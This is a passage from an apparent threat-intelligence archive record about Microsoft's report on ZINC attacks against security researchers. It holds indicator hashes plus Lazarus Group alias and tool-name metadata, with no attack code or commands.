15\n\n'ada7e80c9d09f3efb39b729af238fcdf375383caaf0e9e0aed303931dc73b720',\r\n'edb1597789c7ed784b85367a36440bf05267ac786efe5a4044ec23e490864cee',\r\n'33665ce1157ddb7cd7e905e3356b39245dfba17b7a658bdbf02b6968656b9998',\r\n'3ab770458577eb72bd6239fe97c35e7eb8816bce5a4b47da7bd0382622854f7c',\r\n'b630ad8ffa11003693ce8431d2f1c6b8b126cd32b657a4bfa9c0dbe70b007d6c',\r\n'53f3e55c1217dafb8801af7087e7d68b605e2b6dde6368fceea14496c8a9f3e5',\r\n'99c95b5272c5b11093eed3ef2272e304b7a9311a22ff78caeb91632211fcb777',\r\n'f21abadef52b4dbd01ad330efb28ef50f8205f57916a26daf5de02249c0f24ef',\r\n'2cbdea62e26d06080d114bbd922d6368807d7c6b950b1421d0aa030eca7e85da',\r\n'079659fac6bd9a1ce28384e7e3a465be4380acade3b4a4a4f0e67fd0260e9447')\r\nSource: https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/" ], "report_names": [ "zinc-attacks-against-security-researchers" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439055, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/dddfee5671f3436a8a1a59845e4983c3453df15b.pdf", "text": "https://archive.orkl.eu/dddfee5671f3436a8a1a59845e4983c3453df15b.txt", "img": "https://archive.orkl.eu/dddfee5671f3436a8a1a59845e4983c3453df15b.jpg" } }